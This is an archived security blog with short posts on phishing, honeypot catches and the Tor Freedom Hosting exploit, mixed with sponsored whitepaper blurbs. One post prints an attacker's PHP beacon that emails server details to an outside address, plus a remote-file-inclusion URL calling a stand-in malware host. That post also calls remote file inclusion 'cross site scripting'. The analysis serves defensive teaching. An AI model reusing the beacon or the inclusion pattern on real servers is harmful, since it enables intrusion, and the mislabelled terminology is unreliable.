This Blog has Moved!

This blog is moving to


Thank you for visiting! Content will remain here for archival purposes.

How to Avoid the Coming Backup Crunch

The following is external content provided as a free resource for blog readers.

Dell's critically acclaimed AppAssure enables IT to capture continuous backup snapshots, automate recoverability testing and offload data deduplication/compression.

As a result, businesses can successfully fulfill rapidly escalating data protection requirements using minimal infrastructure and human resources — allowing them to redirect resources to genuinely strategic technology initiatives.

Dell AppAssure 5: Free Trial Download

The following is external content provided as a free resource for blog readers.

Register now to download this free trial.

Anon Steganography Cracked, Further Mysteries Lie Within

Flashback to January of this year, when I posted that Anonymous has most likely been infiltrated by multiple organizations (including law enforcement and terror organizations) and may be unwittingly distributing terrorist messages.

I have finally cracked open one of the Anonymous-related images suspected of containing steganography... and I'm quite intrigued by its contents. As far as I know, this is only the second steganographic image found in the wild which has been successfully cracked. The first image was posted online by NBC back in 2001 as part of a news story, and had a very simple password of "abc".

#ALERT: As Tensions Escalate with Syria, Beware Phishing Attacks

As tensions escalate with Syria, it is highly probable that phishing attacks will begin accompanying real news articles.

A common tactic used by malware writers and phishing senders is to exploit recent news to get you to download their malicious files. This could be through a well-crafted email with an embedded link or infected attachment, claiming to be a real news article.

The most important step you can take is to be vigilant, and don't click on links within emails, even if they appear to originate from friends. A common tactic now used by scammers and phishers is to compromise someone's email account, then use that account to send messages to the person's contacts.

Also, don't expect this to come only through email. Many spammers and phishers are now using social media, including Facebook and Twitter messages.

Know the signs of targeted spear phishing. If you work for the government, or are employed by a government contractor, you will be a prime target. Spearphishing directed towards you may appear very credible, and may even be sent to your work email address.

Stay Vigilant.

Why the Syrian Electronic Army Didn't Hack the NY Times

I'm just going to come out and say it. The Syrian Electronic Army (SEA) is a fraud. They didn't "hack" the New York Times, or any other high visibility websites today.

All SEA did today was an extremely old trick: domain hijacking. For those not familiar with it, here's a great writeup on how domain hijacking works.

Now, it's possible that SEA performed the domain hijacking by compromising MelbourneIT, but that in itself is also unlikely, given that their previous successful "attacks" used low-tech spearphishing (targeted social engineering) to obtain credentials from target organizations.

Previously, Syrian Electronic Army gained control of the Associated Press' Twitter account, The Onion's Twitter account, and the advertising service "Outbrain", all through spearphishing attacks.

Sensationalize their "hacking abilities" all you want. The Syrian Electronic Army has so far displayed very little technical skill, instead attacking "soft targets" and using social engineering. While these attacks have so far been effective, they only point out the lack of security awareness training in today's workforce, and not any serious software flaws.

Any organization which has been directly hit by SEA (and that excludes the victims of domain hijacking) should seriously reexamine their employee security awareness training, and possibly consider bringing in an outside consulting company to help identify deficiencies.

The weakest link in any network will always be uneducated users.

Blade Server Strategies: Optimizing the Data Center

The following is external content provided as a free resource for blog readers.

Blade servers bring efficiency and agility to IT infrastructures by making it easy to add and move resources and applications. In a recent study, IDC found that companies using blade servers were able to cut operating expenses by 64 percent.

But to extract the optimal benefits from blade servers, IT shops must choose a vendor whose strategy and tools reduce complexity, simplify management, support lifecycle automation and deliver the flexibility to work in any environment.

My Free Magazines! New Website!

I started a new website today called "My Free Magazines!"

It's a free resource for just about every industry, offering free magazines, whitepapers, and technical resources.

Go check it out at http://www.MyFreeMagazines.tk

A Look at Fax Phishing

I recently set up a new honeypot which appears to be an IT security related company.

In addition to a few other hidden gems, this honeypot is complete with fake contact information for the company, including email, phone, and fax.

Today I received my first hit from the honeypot - and I was very surprised when it was a phishing attempt over fax!

The Phishing Attempt sent over Fax
This fax claims to be from the company's HR department, is addressed to all employees, and advertises a 6-day all-inclusive vacation at an exotic out-of-the-country location for only $129 per person.

The old adage holds true here - if something sounds too good to be true, it probably is.

A quick search shows that the number is very commonly used in scams, as seen here and here.

Of course the dead giveaway that this is a scam is that my honeypot doesn't have an HR department, and no one actually exists in the company to send such an offer out to the honeypot's nonexistent employees.

I have a feeling this new honeypot will provide for some great entertainment. Stay tuned for more!

Implementing Enterprise BYOD with Mobile Certificates

The following is external content provided as a free resource for blog readers.

While the majority of companies now support BYOD, few have been able to effectively manage the phenomenon. Implementing a mobile certificate offers a level of stability, security, and authentication that passwords can't provide.


How Virtualization is Key to Managing Risk for the SMB Market

The following is external content provided as a free resource for blog readers.

Virtualization can save your infrastructure before an outage occurs and can also ensure an efficient recovery without data loss. Read this eBook to learn how VMware® virtualization solutions can help prepare your systems for a disaster and protect your data if one does strike.

A Look At A Simple PHP Cross Site Scripting Attack

Someone was recently kind enough to attack my honeypot with an extremely simple PHP cross site scripting attack, suitable for teaching others.

How does a PHP cross site scripting attack work? Some PHP scripts allow loading of external scripts through special HTTP parameters. For example, an attacker could invoke a PHP cross site scripting attack against a vulnerable file using a URL such as:
http://myhoneypot.net/scripts/php/vulnerablescript.php?src=http://malwaresite.info/malware.php
The above attack would result in vulnerablescript.php executing malware.php.

One of the simplest attacks I've seen is detailed in the following lines:

<?php
$language = 'eng';
$auth     = 0;
$name     = ''; // md5 Login
$pass     = ''; // md5 Password
/**************************************************************************************************************************************************************/
error_reporting(0);
$time_shell = "".date("d/m/Y - H:i:s")."";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode ='setoran @'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = 'komixobh@gmail.com';
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";
$linkcr = "Ni Bos Link Nya : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Yang Gunain : $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode
Reply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);
?> 
In this attack, the server sends an email message to komixobh@gmail.com providing the server name and URL exploited. This effectively tells the attacker where their scanning script succeeded, so that they can attack with more advanced scripts.

Quite genius really, don't let the server admin see your full capabilities in case it's a honeypot. Unfortunately for our attacker, this script reveals his email address (komixobh@gmail.com) which is being posted publicly on my blog. My blog is frequented by spam crawlers on a regular basis, so hopefully komixobh enjoys speaking with Nigerian Princes and receiving offers for male "enhancement" drugs.

The exploit really is that simple, though: write a PHP script, upload it somewhere, and use it against vulnerable scripts with cross site scripting.

This is why it's important to always maintain current security patches, and follow vendor and industry best practices for securing your web applications.
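The attack URL above only works against a script that hands a request parameter straight to include(), a pattern generally known as remote file inclusion. The following is an added example, not code from this blog or from the attacker's script: it shows that vulnerable pattern beside a hardened version that maps the parameter onto a fixed server-side allowlist. The file names under lang/ and the parameter name src are assumptions for illustration.

```php
<?php
// Added example (not the blog's code). Shows the include pattern behind
// ?src=http://malwaresite.info/malware.php and a hardened replacement.
// The files under lang/ are assumed to exist for illustration only.

// VULNERABLE: the client chooses the file that gets executed. If php.ini has
// allow_url_include=On, a URL in ?src= fetches and runs a remote script; even
// with it off, the client can still name local files the server should not run.
function load_module_vulnerable(): void
{
    include $_GET['src'];
}

// HARDENED: the client supplies only a short key; the path comes from a
// server-side allowlist, so no client-controlled string ever reaches include().
const MODULES = [
    'eng' => 'lang/eng.php',   // assumed file
    'deu' => 'lang/deu.php',   // assumed file
];

// Returns the absolute path for a known key, or null for anything else
// (arrays from ?src[]=..., URLs, traversal strings, stream wrappers).
function resolve_module(mixed $key): ?string
{
    if (!is_string($key) || !array_key_exists($key, MODULES)) {
        return null;
    }
    return __DIR__ . '/' . MODULES[$key];
}

function load_module_hardened(): void
{
    $path = resolve_module($_GET['src'] ?? 'eng');
    if ($path === null) {
        http_response_code(400);
        exit('unknown module');
    }
    include $path;
}

// Defence in depth: keep remote includes disabled server-wide as well.
// php.ini:  allow_url_include = Off   (the default since PHP 5.2)

// Quick self-check from the command line: php thisfile.php
if (PHP_SAPI === 'cli') {
    $probes = [
        'eng',                                   // valid key: allowed
        'http://malwaresite.info/malware.php',   // remote URL: rejected
        '../../lang/eng.php',                    // traversal string: rejected
        ['eng'],                                 // array parameter: rejected
    ];
    foreach ($probes as $probe) {
        $label  = is_string($probe) ? $probe : 'array';
        $result = resolve_module($probe);
        echo $label, ' => ', $result === null ? 'rejected' : 'allowed', PHP_EOL;
    }
}
```

The design point is that the allowlist maps a token to a path rather than validating the client string itself. Filtering out "http://" from the parameter is weaker, because local paths and PHP stream wrappers such as php:// and data: would still be accepted, whereas an unknown key simply never reaches include().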

You can see more example PHP scripts at my Malware Analysis Google Code page.

HP StoreOnce: Boldly Go Where No Deduplication Has Gone Before

The following is external content provided as a free resource for blog readers.

This paper will describe the challenges of data protection, why deduplication is critical to meeting the challenges, how HP is achieving its vision of federated dedupe with StoreOnce – and what HP’s StoreOnce VSA announcement and achievement means to backup services providers, enterprises with remote or branch offices and small and medium businesses as well.

Sponsored by HP and Intel® Xeon® processors.

Intel, the Intel logo, Xeon, and Xeon Inside are trademarks or registered trademarks of Intel Corporation in the U.S. and/or other countries.

Symantec Intelligence Report: June 2013

The following is external content provided as a free resource for blog readers.

In this month's report we take a look at what has happened in a number of key sections of the threat landscape. We delve deeper into the trends surrounding vulnerabilities, including zero-day, browser, and plug-in vulnerabilities. We also take a look at phishing trends over the last few months, as well as what has been happening in both the spam and malicious code areas of the threat landscape. Finally we include the latest high-level stats surrounding data breaches in June. We've also provided a run-down on the biggest security stories for the month of June, recapping what happened and what that means to our readers.

The Evolution and Value of Purpose-Built Backup Appliances

The following is external content provided as a free resource for blog readers.

Customer strategies for data protection and recovery continue to be dictated by aggressive SLAs, rapid recovery, and ease of integration in existing environments. As a result, firms are embracing more disk-based data protection technologies, including Purpose-Built Backup Appliances (PBBAs) to protect and recover data and applications. These appliances include features such as data deduplication, compression, encryption, and replication. Meanwhile, unabated data growth continues to pressure IT staff and protection and recovery processes, leading customers to consider alternative backup methods and targets.

This IDC White Paper explores the increased use and adoption patterns of PBBAs, both integrated and targeted, and the utility these appliances provide to customers in their data protection processes. In addition, this White Paper illuminates the customer value that Symantec's Backup Exec and NetBackup appliances bring to the data protection and recovery process.
304% Return on Investment with SilverSky Network Security Solutions

The following is external content provided as a free resource for blog readers.

Download this study to learn how to evaluate the potential financial impact of SilverSky security services for your organization.

SilverSky Email Encryption Demo

The following is external content provided as a free resource for blog readers.

SilverSky owns and operates the infrastructure, so no software is required at the organization level, minimizing cost and staff upkeep. The solution offers a variety of customizable tracking and reporting capabilities through a web portal and all messages can be stored for compliance purposes with SilverSky Email Archive.

Email Data Loss Prevention (DLP)

The following is external content provided as a free resource for blog readers.

Watch this video to see firsthand how SilverSky's policy-driven Email Data Loss Prevention solution provides unmatched security and privacy at a fraction of the cost and complexity of old fashioned appliance and end-point approaches.

Buyer's Guide: Selecting an SSL Management System

The following is external content provided as a free resource for blog readers.

An effective SSL Management System provides for the rapid deployment of Enterprise Security, Trust and Regulatory Compliance. SSL Management enables you to confidently address security challenges, significantly reducing your business risks and operating costs. Read more about best practices for selecting an SSL Management System.

What the FBI probably knows about Tor Users

Vlad Tsyrklevich has posted an excellent analysis of the payload delivered by the Tor Browser Bundle exploit.

This payload was delivered to every Tor Browser Bundle user who visited a Freedom Hosting hosted Tor Hidden Service, including Tormail.

According to Vlad, the exploit sends the hostname and MAC address of the local system to 65.222.202.54 over HTTP, then crashes.

So, what can the FBI do with this information?

Well, they now have a record of what systems were visiting all sites on Freedom Hosting.
It is also safe to assume that the FBI now has all emails and logs stored by Tormail.

The Tormail emails can be an excellent datamine without any additional info. Many Tormail users could have possibly revealed sensitive information over Tormail, including their name and home address, especially if using Tor to order illicit goods or services.

However, the hostname and MAC address can also be useful.
For example, the FBI can use the MAC address to subpoena a computer manufacturer to find out who purchased the computer. They can then use the hostname to verify they have the right person.

For example, let's say the FBI got a hostname of "DOE-PC" and a MAC address matching a Dell laptop.

The FBI contacts Dell with a subpoena ("Did you sell a computer to someone named Doe with MAC address XX:XX:XX:XX?"), and Dell can send them the transaction information, including the home address.

This is a big win for law enforcement worldwide, and should help to end some of the illegal activities occurring on Tor.


Just remember kiddies, there is no such thing as "private" on the Internet. Not even on Tor.


NOTE: You can review the deobfuscated JavaScript at my Malware Analysis Google Code site: https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/TorFreedomHosting/

Massive TOR Hidden Service Compromise

It was announced today on Twitter that one of the major "hidden services" hosting companies has been delivering malicious content, and that the hosted sites were shut down after a raid by law enforcement.

Supposedly, the compromised services include "TorMail", which provides anonymized email services.

If TorMail has been compromised, this could have broader reaching effects, including giving the FBI and Interpol the ability to directly access associated accounts outside of Tor hidden services. It would then be easy for the authorities to request from associated websites a log of associated IP addresses.

This spells bad news for anyone who uses Tor for illegal purposes, and a major win for the law enforcement community.

NOTE: You can view deobfuscated versions of the malicious code at my Malware Analysis Google Code site: https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/TorFreedomHosting/

New Shodan Search: Trilithic

A New Shodan Search is now saved on SHODAN - Recently Saved Searches

Title: Trilithic

Description:

Trilithic creates cable and satellite equipment for diagnostics and maintenance, including Emergency Alert System equipment.

URL:

http://www.shodanhq.com/?q=Trilithic

Blog Updated to Include Shodan Searches and Free Security Resources

I've set up a couple of experimental IFTTT recipes to automatically post new Shodan searches to my blog, as well as new cyber security resources as they become available.

If you notice it malfunctioning, please let me know via Twitter. This is a brand new feature, and I hope it works well.

@th3j35t3r Domain Seized by DHS, Arrested at Blackhat?

UPDATE: It appears that jesterscourt.cc is restored. This appears to all have been a hoax on the Jester's part.


It has been brought to light that The Jester's domain, jesterscourt.cc, has been seized by the Department of Homeland Security (DHS).

At the same time, Jester has gone dark on Twitter, with no new posts since July 31. Jester had already made multiple posts showing that he was attending the Blackhat conference in Las Vegas.

Does this mean Jester has been arrested at the Blackhat conference? This would explain the sudden seizure of his domain, and why his Twitter feed has gone dark.

This wouldn't be the first time a hacker was arrested at a Las Vegas conference. In 2001 a Russian hacker was arrested at DEFCON.


It's important to note that Jester has previously faked his own "retirement" in the Smedley Manning incident.